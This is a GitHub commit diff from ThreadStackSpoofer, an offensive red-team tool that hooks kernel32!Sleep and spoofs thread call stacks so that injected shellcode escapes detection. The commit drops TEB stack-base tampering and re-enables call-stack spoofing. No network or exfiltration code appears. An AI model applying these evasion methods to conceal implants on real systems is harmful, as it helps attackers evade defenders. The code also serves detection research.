Skip to content

Commit 147fc1e

Browse files
mgeekymgeeky
committed
readme
1 parent 6dd84dd commit 147fc1e

File tree

2 files changed

+2
-57
lines changed

2 files changed

+2
-57
lines changed

ThreadStackSpoofer/header.h

Lines changed: 0 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -65,10 +65,6 @@ struct StackTraceSpoofingMetadata
6565
bool initialized;
6666
CallStackFrame spoofedFrame[MaxStackFramesToSpoof];
6767
size_t spoofedFrames;
68-
ULONG_PTR legitTebBaseLow;
69-
ULONG_PTR legitTebBaseHigh;
70-
ULONG_PTR origTebBaseLow;
71-
ULONG_PTR origTebBaseHigh;
7268
};
7369

7470
struct HookedSleep

ThreadStackSpoofer/main.cpp

Lines changed: 2 additions & 53 deletions
Original file line numberDiff line numberDiff line change
@@ -11,30 +11,15 @@ void WINAPI MySleep(DWORD _dwMilliseconds)
1111
const volatile DWORD dwMilliseconds = _dwMilliseconds;
1212

1313
// Perform this (current) thread call stack spoofing.
14-
//spoofCallStack(true);
14+
spoofCallStack(true);
1515

1616
log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n");
1717

18-
PULONG_PTR ptr = (PULONG_PTR)_AddressOfReturnAddress();
19-
ptr--;
20-
21-
22-
Start_Of_TEB* teb = (Start_Of_TEB*)NtCurrentTeb();
23-
g_stackTraceSpoofing.origTebBaseLow = (ULONG_PTR)teb->StackBase;
24-
g_stackTraceSpoofing.origTebBaseHigh = (ULONG_PTR)teb->StackLimit;
25-
26-
teb->StackBase = (void*)g_stackTraceSpoofing.legitTebBaseLow;
27-
teb->StackLimit = (void*)g_stackTraceSpoofing.legitTebBaseHigh;
28-
2918
// Perform sleep emulating originally hooked functionality.
3019
::SleepEx(dwMilliseconds, false);
3120

32-
33-
teb->StackBase = (void*)g_stackTraceSpoofing.origTebBaseLow;
34-
teb->StackLimit = (void*)g_stackTraceSpoofing.origTebBaseHigh;
35-
3621
// Restore original thread's call stack.
37-
//spoofCallStack(false);
22+
spoofCallStack(false);
3823
}
3924

4025
bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers /*= NULL*/)
@@ -461,36 +446,6 @@ bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr &thread)
461446
return (NULL != thread.get());
462447
}
463448

464-
465-
void WINAPI _acquireLegitimateThreadStack(LPVOID param)
466-
{
467-
Start_Of_TEB* teb = (Start_Of_TEB*)NtCurrentTeb();
468-
g_stackTraceSpoofing.legitTebBaseLow = (ULONG_PTR)teb->StackBase;
469-
g_stackTraceSpoofing.legitTebBaseHigh = (ULONG_PTR)teb->StackLimit;
470-
471-
::SleepEx(INFINITE, false);
472-
}
473-
474-
bool acquireLegitimateThreadStack()
475-
{
476-
CallStackFrame frames[MaxStackFramesToSpoof] = { 0 };
477-
size_t numOfFrames = 0;
478-
479-
HandlePtr secondThread(::CreateThread(
480-
NULL,
481-
0,
482-
//(LPTHREAD_START_ROUTINE)::Sleep,
483-
(LPTHREAD_START_ROUTINE)_acquireLegitimateThreadStack,
484-
(LPVOID)INFINITE,
485-
0,
486-
0
487-
), &::CloseHandle);
488-
489-
Sleep(1000);
490-
491-
return true;
492-
}
493-
494449
int main(int argc, char** argv)
495450
{
496451
if (argc < 3)
@@ -518,12 +473,6 @@ int main(int argc, char** argv)
518473
return 1;
519474
}
520475

521-
if (!acquireLegitimateThreadStack())
522-
{
523-
log("[!] Could not acquire legitimate thread's stack.");
524-
return 1;
525-
}
526-
527476
log("[.] Hooking kernel32!Sleep...");
528477
if (!hookSleep())
529478
{

0 commit comments

Comments
 (0)